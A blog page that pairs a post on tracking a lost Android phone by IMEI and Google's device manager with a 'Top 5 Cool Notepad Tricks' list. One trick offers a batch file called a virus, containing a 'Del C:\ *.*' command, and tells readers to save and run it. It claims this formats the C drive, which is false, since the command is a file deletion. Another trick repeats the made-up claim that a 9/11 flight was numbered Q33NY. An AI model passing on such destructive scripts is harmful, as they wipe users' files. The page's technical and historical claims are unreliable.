Come on forward to let the world behind

Welcome to Technology era Great visit here

Showing posts with label notepad tricks. Show all posts
Showing posts with label notepad tricks. Show all posts

Friday, November 04, 2016

How to Track Your Lost or Stolen Android Phone?





How to Track Your Lost or Stolen Android Phone



Your smartphone is a bit of everything. You have all your photos, important documents and friend’s contact list on it. Losing one or having it stolen is the worst nightmare one shall have. Taking that into perspective, we have narrowed down few steps one should carry in case his/her smartphone gets lost.

How to Track Your Lost or Stolen Android Phone

STEP 1:

First and foremost thing after buying a smartphone is to write down the IMEI number of your phone. Every smartphone has a unique IMEI number (International Mobile Equipment Identity Number). A dual SIM phone will have 2 IMEI number. It will also be printed on the back of your device’s packaging. If you are unable to find the number, you have to launch your phone app and dial the number *#06#. This will give you the IMEI number of your phone. Store this number in a safe place so that it helps you in locating your phone when it is lost. Another way of finding an IMEI number is by logging intogoogle dashboard account.

If your phone gets lost, you can file a Police complaint by filling up this form (download here) and submitting it to the Regional Police Unit Office (Hanuman Dhoka, Teku for Kathmandu Valley users). You have to provide IMEI number of your phone while filing a police complaint and then your service provider (NTC/NCell) uses this IMEI number to track your phone. Also, make sure that you block the SIM card that was being used in the handset. This will force the thief to replace the SIM, which will help us find his/her identity.
How IMEI tracking works?
Your Network provider will blacklist the IMEI number(s) which you provided while filing a complaint and when the thief inserts a new SIM on that phone, the BTS (Tower) will receive the details of the new SIM inserted. From that details of the new SIM, you will know the thief’s name and all the details.

STEP 2:

Track Your Lost or Stolen Android PhoneDownload Google’s Android Device Manager (Link). If you lose your phone, you can just visit www.google.com/android/devicemanager website and locate it with your Google account. Using this, you can find it on a map, ring it, lock it, or remotely erase it. This service will be the best option for most Android users.

 STEP 3:

Turn on Photos sync on Google photos or use DropBox. Syncing your camera photos can be a good idea. A clever idea indeed, if it works. The suspected thief can use your camera and click some selfies or photos and you can view their photos from your google plus account.

STEP 4:

Inform your friends and family of the theft. It’s possible that the thief may try to impersonate you through social media or via SMS.

Wednesday, May 22, 2013

Top 5 Cool Notepad Tricks

Top 5 Cool Notepad Tricks





Technology era on facebook

1. World Trade Center Attack Trick

The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definately amazed by the this trick.

    1. Open Notepad and Type “Q33N” (without quotes) in capital letters.
    2. Increase the font size to 72.
    3. Change the Font to Wingdings.


2. Matrix Effect Trick

In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Noteapad and copy below code into it.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen.


3. Creating Virus That Format C Drive

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
 
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.


4. Making Personal Diary Using Notepad 

Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.

    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad


5. Dancing Keyboard Led

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

    1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
   
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.


ENJOY(-_-)